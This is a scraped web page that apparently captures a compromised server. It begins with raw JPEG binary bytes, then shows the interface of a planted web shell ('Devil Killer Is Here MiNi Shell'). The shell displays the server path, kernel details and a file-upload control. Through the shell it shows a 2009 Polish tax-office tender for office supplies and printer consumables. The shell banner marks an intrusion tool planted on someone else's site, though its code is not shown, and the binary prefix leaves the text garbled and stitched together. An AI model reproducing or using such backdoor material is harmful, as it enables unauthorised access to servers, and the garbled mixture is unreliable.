JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090722/249568-N-2009.html

<p class="kh_header"><b>Sieradz: Dostawa materiałów biurowych i akcesoriów komputerowych dla Urzędu Skarbowego w Sieradzu</b><br>
<b>Numer ogłoszenia: 249568 - 2009; data zamieszczenia: 22.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w Sieradzu , ul. Spółdzielcza 3, 98-200 Sieradz, woj. łódzkie, tel. 043 8279079, faks 043 8220192.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ussieradz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i akcesoriów komputerowych dla Urzędu Skarbowego w Sieradzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy materiałów biurowych i akcesoriów komputerowych dla 
Urzędy Skarbowego w Sieradzu wg poniżej wyszczególnionych składników zamówienia:
-	papier biały klasy C, białości co najmniej 146 -166 CIE 
pakowany po 5 ryz, formatu A4,  równoważny papierowi  POLspeed
w ilości  3200 ryz  ( 640 kartonów)
-	papier biały klasy C, białości co najmniej 146 -166 CIE 
pakowany po 5 ryz, formatu A3, równoważny papierowi POLspeed
w ilości 100 ryz ( 20 kartonów)
-	papier komputerowy bezpyłowy, przyjazny dla środowiska, składanka 
komputerowa typu DRESCHER o rozmiarach:
    375 x 12   x  (1 + 0)   w ilości    45  op. ( 1 op. -  2000 szt.)
    250 x 12   x   (1 + 0)  w ilości     5 op.( 1 op. - 2000 szt.)
    250 x 12   x   (1 + 1)  w ilości    15 op. ( 1 op. -  900 szt.) 
       -    papier ozdobny rodzaju (papirus), formatu A4, umożliwiający przygotowanie dyplomu w ilości                                 
            2 op. (op. 25 szt.)  
      -     skoroszyty białe kartonowe zwykłe w formacie A4   w ilości    12000 szt.
-	skoroszyty oczkowe białe z całą wierzchnią okładką i metalowymi
oczkami, formatu A4                 w ilości    6000 szt.
-	skoroszyty miękkie wykonane z ekologicznego polipropylenu, formatu
A4 koloru zielonego, niebieskiego, żółtego, i  czerwonego z dwustronnie zapisywanym  paskiem brzegowym, przednia okładka przezroczysta   w ilości       200  szt. 
-	skoroszyty wykonane z PCV, twarde, wpinane do segregatora, formatu
A4, z dwustronnie zapisywanym paskiem brzegowym, koloru żółtego,
czerwonego, niebieskiego, miętowego i zielonego, przednia okładka przezroczysta w ilości  2500  szt.
-	segregatory w formacie A4 wykonany z utwardzonego kartonu, dźwignią
z dociskiem, szerokość grzbietu 75 mm, koloru szaro-czarnego typu 
(marmurek) (zwykłe)                w ilości   8000 szt.
-	segregatory  w formacie A4 , wykonane z tektury pokrytej ekologiczną folią polipropylenową  z  mechanizmem, wymienną etykietą, w kolorze niebieskim, czerwonym, czarnym  i zielonym o szerokości grzbietu:
	75 mm  w ilości     1000   szt.
	50 mm  w ilości       500   szt.
-	koperty  białe SP z paskiem  (C6) o wymiarach 16 x 11 cm
w ilości         60000 szt.
-	koperty  białe SP z paskiem i okienkiem prawym (C6) o wymiarach
16 x 11 cm   w ilości    25000 szt.
-	koperty białe SP z paskiem i okienkiem prawym formatu DL o wymiarach 22 x 11 cm                w ilości    50000  szt.
-	koperty brązowe SP z paskiem (C4) o wymiarach 229 x 324 mm
w ilości      6000 szt.
-	koperty brązowe SP z paskiem  (B5) o wymiarach 176 x 250 mm
w ilości   10000  szt.
-	koperta  brązowa SP z paskiem (B4) o wymiarach 250 x 353  mm
w ilości 10000 szt.
-	koperta z rozszerzanymi bokami brązowa (E4) o wymiarach
280 x 400 x 40  mm   w ilości   600 szt.
-	koperta z rozszerzanymi bokami, brązowa (B4) o wymiarach
250 x 353 x 40 mm     w ilości  600 szt.
-	koperty ochronne na CD, z folią bębenkową, brązowe, SP z paskiem
o wymiarach  zewnętrznych  200 x 275 mm w ilości  100  szt.
-	teczki wiązane białe, formatu A4, kartonowe (zwykłe)  w ilości
          2000 szt.
-	teczki  białe, kartonowe, formatu A4, zamykane na gumkę (bez zaczepów), w ilości   600 szt.
-	teczki kolorowe, kartonowe, lakierowane, zamykane na gumkę bez 
zaczepów, formatu A4  (żółte, .niebieskie, czerwone)   w ilości  200  szt.
-	teczki akademickie, skrzydłowe, zamykane na rzepy, koloru niebieskiego
i czerwonego , formatu A4  w ilości:
	o szerokości  grzbietu 10 mm   -  50  szt.
            o szerokości  grzbietu 20 mm   -  50  szt.
-	bloki szkolne makulaturowe, w kratkę,  klejony po krótszym boku, o 100 arkuszach w następujących ilościach:
w formacie A4   -   1000  szt.
w  formacie A5  -    200  szt.
-	zeszyty , bruliony w twardej, laminowanej, oprawie, formatu A4, w kratkę, 96  kartkowe  w ilości     300   szt.
-	zeszyty w kratkę,  60 kartkowe, w okładce kartonowej, laminowanej, 
     formatu A5  w ilości  100 szt.
-	zeszyty w kratkę, 32 kartkowe, w okładce kartonowej, laminowanej,
          formatu A5   w ilości  150  szt.
-	klej  biurowy w sztyfcie o wielkości 25 gramów, nie zawierający
rozpuszczalników, równoważny klejom firmy  PRITT lub TESA      w ilości     3000 szt.
-	zszywacze biurowe, metalowe, zszywające do 25 kartek papieru, koloru czerwonego lub niebieskiego równoważny zszywaczom  SAX 249, LETACK PS-261, obrotowy
      w ilości  100  szt.
-	zszywacze biurowe, zszywające do 50 kartek papieru, koloru niebieskiego lub czerwonego, odpowiadający warunkom technicznym dla typu NOVUS  B 4 FC     w ilości   10 szt.
-	zszywacz  introligatorski, zszywający do 100- 130 kartek papieru,  metalowy odpowiadający wymogom technicznym  dla  typu SAX 299 lub EAGLE  938, 839  w ilości      4 szt.
-	zszywki stalowe,  typu  24/6  w ilości  150 szt. dużych opakowań 
(10 x 1000) x 150
-	zszywki stalowe, typu  23/8 i 23/13 w ilości  20 szt. dużych opakowań
                     ( 10  x  1000) x 200
-    rozszywacze  uniwersalne   w ilości   60 szt.
-	nożyczki z nierdzewnej stali, wysokiej jakości, z wytrzymała rączką  odporną na pęknięcia, do cięcia  papieru, kartonu czy tektury, wielkości 16 cm  w ilości   100  szt.
-	nóż do kopert wykonany z nierdzewnej stali, uchwyt z tworzywa
długości  20 cm   w ilości  10 szt.
-	flamastry  biurowe- pisaki (mazaki) szybkoschnące, o grubości linii piszącej do  1,5 mm , w łącznej ilości  500  szt. - w  następujących kolorach:
      czarny  w ilości        250  szt.
      zielony  w ilości       100  szt.
      czerwony  w ilości   100  szt.
      niebieski  w ilości      50  szt.
-	cienkopisy  wyposażone w metalową końcówkę o grubości 0,5 mm, w plastikowej obudowie, w kolorach czarny, zielony, czerwony, niebieski w łącznej ilości   800   szt.
-	klipsy  do spinania papieru, odporne na odkształcanie, pakowane
po 12 szt. w różnych wielkościach  (19-51 mm) w ilości  400 opakowań,
-	spinacze biurowe okrągłe, niklowane o rozmiarze 28 mm w ilości  500 op. małych  (500 x 100)
-	spinacze biurowe niklowane, okrągłe - plikowe, pakowane po 100 szt.  o rozmiarze  50 mm w ilości  80 opakowań małych  ( 80 x 100)
-	spinacze biurowe krzyżowe, niklowane, o rozmiarze 41 mm, pakowane po 50 szt.  w ilości 100 opakowań małych (100 x 50),
-	pinezki beczułki (kołeczki) do tablic korkowych w opakowaniach po
100 szt. w ilości  5 opakowań  
-	rolki do faksów wykonane z papieru termoczułego o szerokości 210 mm długości papieru 30 m , średnicy wewnętrznej 12 mm, pakowane po 6 rolek w ilości 25 opakowań  (150 rolek),
-	rolki do maszyn liczących wykonane z wysokiej jakości papieru offsetowego o rozmiarach 57mm x 30m, pakowane po 10 rolek w zgrzewce w ilości   240 rolek   ( 2 kartony)
-	rolki do maszyn liczących wykonane z wysokiej jakości papieru offsetowego o rozmiarach 69mm x 30 m, pakowane po 10 rolek w zgrzewce w ilości  120 rolek 
      -     gumki zwykłe do ołówka,  syntetyczne,  równoważne gumkom FACTIS
             S-20 lub PELIKAN AS40, o rozmiarach minimum 54x23x13 mm   w ilości     150 szt.
-	temperówki  z pojedynczym ostrzem  o średnicy 8 mm , z aluminium, do ołówków (kostka metalowa)  w ilości  100 szt.
-	linijki wykonane z przezroczystego polistyrolu, odporne na złamanie, z nieścieralną  podziałką, o rozmiarze 30 cm w ilości  150  szt.
-	koszulki na dokumenty  z folii polipropylenowej, otwarte na górze, przezroczyste, antyelektrostatyczne, dziurkowane, pakowane po 100 szt. w poniższych ilościach i formatach:
        format A4    w ilości  150 opakowań   ( 150x100)
        format A5    w ilości   5 opakowań   ( 5 x 100)
-	dziurkacze metalowe, dziurkujące  25- 30  kartek papieru, na 2 dziurki, (odpowiadający  jakości dla dziurkacza SAX 418 lub LETACK MP-300), koloru czerwonego lub niebieskiego w ilości   80  szt.
-	dziurkacze metalowe, dziurkujące do 40 kartek papieru, na 2 dziurki, (równoważny dziurkaczowi SAX 518, LETACK 3131R), koloru czerwonego lub niebieskiego w ilości  80  szt.
-	dziurkacze introligatorskie, dziurkujące 100 - 150 kartek papieru, na 2 dziurki (równoważny  dziurkaczowi SAX 909  lub DELI D0130) z podstawą i dźwignią metalową   w ilości    5 szt. 
-	identyfikatory wyposażone w samozaciskowy klips oraz agrafkę, w wielkości  90 x 57 mm, posiadający wycięcie na palec ułatwiający wysunięcie karty, w komplecie z kartą opisową                w ilości  100 szt.
-	długopisy z przezroczystą obudową, wymiennym wkładem koloru niebieskiego lub czarnego, metalową końcówką, o grubości linii  do 1,00 mm, równoważny długopisom  PENTEL lub PENAC  w ilości  400  szt.
-	długopisy zwykłe w  przezroczystej obudowie, wymiennym wkładem koloru niebieskiego lub czarnego, grubości linii 1 mm odpowiadający  długopisom CORVINA   w ilości  400  szt.
-	długopisy tradycyjne, automatyczne, w obudowie z tworzywa sztucznego, wymiennym wkładem metalowym wielkopojemnym, równoważny długopisom typu ZENITH lub ZIPP,  koloru niebieskiego i czerwonego     w ilości 350 szt.
-	długopisy leżące z przylepcami, podstawą kwadratową, wymiennym krótkim wkładem,  równoważny długopisom KAMET, koloru niebieskiego lub białego     w ilości 300 szt.
-	długopisy stojące z przylepcami, podstawą kwadratowa, wymiennym krótkim wkładem, równoważny długopisom KAMET, koloru niebieskiego lub białego     w ilości 300  szt.
-	wkłady do długopisów  PARKER w kolorze niebieskim lub czarnym, metalowe w ilości  80 szt.
-	wkłady do długopisów typu PENTEL, długi, przeźroczysty   w kolorze:
               niebieskim     w ilości   200  szt.
               czarnym        w ilości    200 szt.
-	wkłady do długopisów typu ZENITH, metalowy, wielopojemny, równoważny  dla typu KAMET  w kolorze:
                     niebieskim  w ilości  300  szt.
                     czarnym   w ilości     200  szt.
-     wkłady do długopisów zwykłe, krótkie, koloru czarnego w ilości  200 szt.
-	ołówki zwykłe drewniane, dobrze ostrzące się, niełamliwe, o twardości B lub HB, bez gumki           w ilości    250  szt.
-	korektory w płaskim piórze, szybkoschnące, z metalową końcówką, specjalnym zaworkiem uniemożliwiającym zaschnięcie końcówki, o zawartości 10- 12 ml,  równoważny dla typu HANDY, PENTEL lub UNI  w ilości    200  szt.
-	kalka ołówkowa w kolorze niebieskim, formatu A4, pakowana po 100 arkuszy, typu PELIKAN lub DELFIN  (10x100) w ilości  10 opakowań
-	tusz do stempli kauczukowych po 25 ml w kolorze czerwonym w ilości   100  szt.  
-	tusz do stempli metalowych po 25 ml  w kolorze:
            czerwonym   w ilości  10  szt.
            czarnym      w ilości     3  szt.
-	poduszki do stempli metalowych w ilości  2 szt.
-	kalkulatory z 12 pozycyjnym wyświetlaczem, funkcją AUTO REPLAYi  CHECK,  z możliwością odtwarzania ostatnich pozycji, z podwójnym zasilaniem, obliczeniami podatkowymi, typu CITIZEN lub CASIO o wymiarach nie mniejszych niż 35x145x195 mm   w ilości    30  szt. 
-	płyty CD o pojemności 700 MB, kompatybilne z najnowszymi napędami 
            do CD, z super trwałą powierzchnią zabezpieczającą, dożywotnią gwarancją, równoważne       
            dla typu PLATINET  w opakowaniach po 50 szt. w ilości   100  szt.  ( 2 opakowań)
      -     DYSK DVD, minimum 4,7 GB    w ilości   50 szt.
-     klawiatury komputerowe multimedialne, połączenia USB i PS/2 w ilości  20  szt.
-	myszy komputerowe optyczne,  wyposażone w rolkę ułatwiającą przewijanie stron WWW lub dokumentów, z typem złącza  PS-2 i USB  o rozdzielczości 800 dpi, równoważne dla typu LOGITECH  w ilości   30  szt.
-	tonery oryginalne do typów drukarek niżej wymienionych:
    HP LaserJet 4050 N(10000kopii)                              w ilości   20 szt.
    HP LaserJet 1300 (2500 kopii)                                 w ilości   5 szt.
    OKI PAGE 14 i/n   (typ 8)                                       w ilości   6 szt.
    OKI B4300 N, B4350  (6000 szt. kopii, typ  9)            w ilości   30 szt.
          OKI B 4545 MSP (12000 kopii, 09004169 )           w ilości    6 szt. 
          OKI B430 DN (7000 kopii, 43979202)                 w ilości     6 szt.      
          OKI B 6300  ( 17000 kopii, 09004079)                w ilości   60 szt.
    OKI C5300 N    (na  5000 kopii) w kolorze:
                               czarny (42127408)             w ilości   4 szt.
                               cyan  (42127407)               w ilości   2 szt.
                               magenta (42127406)           w ilości   2 szt.
                               yellow (42127405)              w ilości   2 szt.
    LEXMARK T 620  (30.000 kopii, 12A6865)                w ilości  12 szt.
    OKI B6500  (22.000 kopii, 09004462)                      w ilości  18 szt.                
    OKI C3300  (na 2500 kopii) w kolorze:
        czarnym (43459331)                       w ilości  20 szt.
        cyan (43459331)                            w ilości  10 szt.
      magenta (43459330)                         w ilości  10 szt.
      yellow (43459329)                            w ilości  10 szt.                       
    OKI C8800 N   (na 6000 kopii) w kolorze:            
                                czarnym (43487712)        w ilości   4 szt.
                                 cyan ( 43487711)           w ilości   2 szt.
                                 magenta (43487710)       w ilości   2 szt.
                                 yellow (43487709)          w ilości   2 szt.                     
    HP 4015 DN  (24.000 kopii, CC364X)                w ilości   5 szt.                        
- bębny do drukarek typu OKI  PAGE 14 i/n                  w ilości    2  szt.
- bębny do drukarek typu OKI B 4300n , B4350             w ilości    3  szt.
- taśmy do drukarek typu TALLY T 22055,2155,MT-360 w oryginale  w ilości 10 szt.
- taśmy do drukarek typu OKI MICROLINE 3320, 3321, 321 w oryginale w ilości   20  szt.
- taśmy DAT (data cartridge)  w oryginale DLA  typu:
                       DDS 4  -  40 GB       w ilości     50 szt.
                       HP DAT 160             w ilości    10 szt.  
- atrament czarny do typu drukarki HP DJ 815 C w oryginale  w ilości   3 szt.
- atrament kolorowy do typu drukarki HP DJ815C w oryginale  w ilości  2 szt.
- środki czyszczące do monitorów komputerowych, filtrów ochronnych antystatyczne, usuwające zabrudzenia, posiadające przyjemny zapach w ilości  50 szt.
- sprężone powietrze do czyszczenia komputerów o pojemności 300 ml w ilości  15 szt.
- środki do czyszczenia zewnętrznych powierzchni komputerów, drukarek, klawiatur, o pojemności 300 ml  w ilości  50 szt.
- tonery do kserokopiarek typu CANON w oryginale n/w ilościach:
                    NP6317 (10000 kopii)                       56 szt.
                    NP6512 (4000 kopii)                         40  szt.
	       iR1210 (5000 kopii)                           12 szt.
                    iR2018, iR2016J  (6000 kopii)              45 szt. 
- taśmy klejące uniwersalne, wykonane z polipropylenu, przezroczyste o  rozmiarze 25mm  x 10 m   w ilości  400  szt.
- taśmy opakowaniowe, polipropylenowe, dostosowane do zamykania kartonów, wytrzymałe, przezroczyste o wymiarach  50 mm x 50 m   w ilości  5 szt.
- wkłady uzupełniające do kostek,  karteczki koloru białego, o rozmiarze  85 x 85 mm      w ilości     200 szt.              
-	pudełko na CD z dwustronnymi koszulkami, zamykane, op 100 szt. w ilości    2 opakowania
- kostki samoprzylepne, 450 kartek w bloczku,  różnego koloru o wym. 76 x 76 mm w ilości     300 szt.  
- grzbiety do bindownicy o średnicy:
     8 mm koloru niebieskiego (pakowane po 100 szt.)     w ilości     1 op.
    10 mm koloru zielonego (pakowane po 100 szt.)        w ilości     1 op.
    12 mm koloru niebieskiego (pakowane po 100 szt.)    w ilości      2 op.
    14 mm koloru niebieskiego (pakowane po 100 szt.)    w ilości      2 op.
    16 mm koloru czerwonego (pakowane po 100 szt.)     w ilości     2 op.
    16 mm koloru zielonego (pakowane po 100 szt.)         w ilości     2 op.
- okładki do bindowania z tworzywa miękkiego pakowane po 100 szt.
          koloru niebieskiego                w ilości      4 op.
          koloru czerwonego                 w ilości      2 op.
          koloru zielonego                     w ilości      4 op.
          koloru żółtego                         w ilości      1 op.
- folia przezroczysta do bindowania pakowana po 100 szt.
       bezbarwna o gr. 0,15 mm               w ilości         8  op.
       żółta o gr. 0,20 mm                       w ilości         2 op.
       zielona o gr. 0,20 mm                     w ilości         2 op.
- zestaw 10 paneli prezentacyjnych z podstawką stołową, umożliwiający
szybkie i łatwe korzystanie z informacji        w ilości           3 szt.
- zestaw 10 paneli prezentacyjnych z uchwytem ściennym, umożliwiający
szybkie i łatwe korzystanie z informacji          w ilości          2 szt.
- szuflady na dokumenty o wymiarach 250 x 65 x 345 mm w ilości:
                 przeźroczyste niebieskie       30 szt.
                 przeźroczyste dymne           30 szt.
- zakreślacze do wydruków atramentowych, pakowane po 3 szt. w opakowaniu koloru zielonego, pomarańczowego i żółtego  w ilości   10 opakowań.
- etykiety termotransferowe, samoprzylepne,  z PP o wymiarach 100 x 31 mm, ilość etykiet na rolce 1000  szt., do drukowania kodów kreskowych na drukarce  ZEBRA TLP w ilości  80 szt.
- etykiety termotransferowe, samoprzylepne, z PP, o wymiarach  50 x 30 mm, ilość etykiet na rolce 1000 szt., do drukowania kodów kreskowych na drukarce ZEBRA TLP w ilości  2 szt.
- taśma termotransferowa  woskowo -żywiczna o wymiarach 110 x 74 mm do drukarki kodów kreskowych ZEBRA TLP w ilości  80 szt.
- taśma termotransferowa woskowo-żywiczna o wymiarach  63,5 x 74 mm do drukarki kodów kreskowych ZEBRA  TLP w  ilości  2 szt. 
- sznurek-szpagat konopny bielony  50 dkg       w ilości      20 szt.
- pojemnik archiwizacyjny, formatu A4,  wykonany z falistej bezkwasowej tektury, pojemność ok 900- 1500 kartek,  o szerokości  grzbietu:
                              100 mm    w ilości                500  szt.
	                 150 mm    w ilości                400  szt.
- pudło archiwizacyjne ścięte, wykonane z falistej bezkwasowej tektury,  
     koloru żółtego, czerwonego, zielonego, formatu A4, o szerokości grzbietu
		          80 mm     w ilości            100 szt.
		        100 mm      w ilości           100 szt.
		        150 mm       w ilości          100 szt.
-   datownik szamotuszujący, w obudowie z tworzywa ABS, wysokość cyfr/
     liter - 3,8 mm , równoważny dla typu TRODAT 4810, dostępny z datą 
    w wersji ISO oraz polskiej   w ilości      30 szt.
-   numerator samotuszujący w obudowie z tworzywa ABS, równoważny dla 
     typu TRODAT 4836, wysokość cyfr - 3,8 mm   w ilości          5 szt.
-   kosze na śmieci uchylne w kolorze szarym, niebieskim,  o pojemności  25 litrów, równoważne                  
    koszom DOMINIK w ilości     30  szt.      

Kod  CPV    30197630 - 1      30125110 - 5
                     30199220 - 1      30190000 - 7.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.12.51.10-5, 30.19.92.20-1, 30.19.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, Którzy spełniają następujące warunki:
1) warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, tj.
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli     ustawy nakładają  obowiązek posiadania takich uprawnień,
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia,
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia,
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2) warunek doświadczenia zawodowego:
Zamawiający  wymaga wykazania wykonania lub wykonywania w okresie ostatnich  3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dwóch  zamówień wykonanych lub wykonywanych z należytą starannością, polegających na  dostawie materiałów biurowych i akcesoriów komputerowych o wartości nie mniejszej niż  90 000 złotych.
3)	warunek ubezpieczenia: 
W dniu składania ofert Wykonawca musi być ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności gospodarczej na sumę  ubezpieczenia w wysokości co najmniej 150 000 zł.  
W przypadku  składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia  ww. warunek Wykonawcy mogą spełnić łącznie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie zgodne z art. 22 ust. 1 ustawy Prawo zamówień publicznych według załącznika nr 2 do SIWZ
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8  oraz pkt. 9 ustawy  Prawo zamówień publicznych - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie bądź rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji naczelnika urzędu skarbowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.	Aktualne zaświadczenie z właściwego oddziału  Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek  na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie bądź rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji oddziału Zakładu Ubezpieczeń Społecznych - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
6.	Wykaz wykonanych lub wykonywanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia na dostawy, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich przedmiotu oraz daty wykonania i odbiorcy oraz   (załącznik nr 3 do SIWZ). Do wykazu należy załączyć dokumenty potwierdzające, że wymagane w części VI  ust.1 pkt.2) dostawy zostały wykonane należycie.
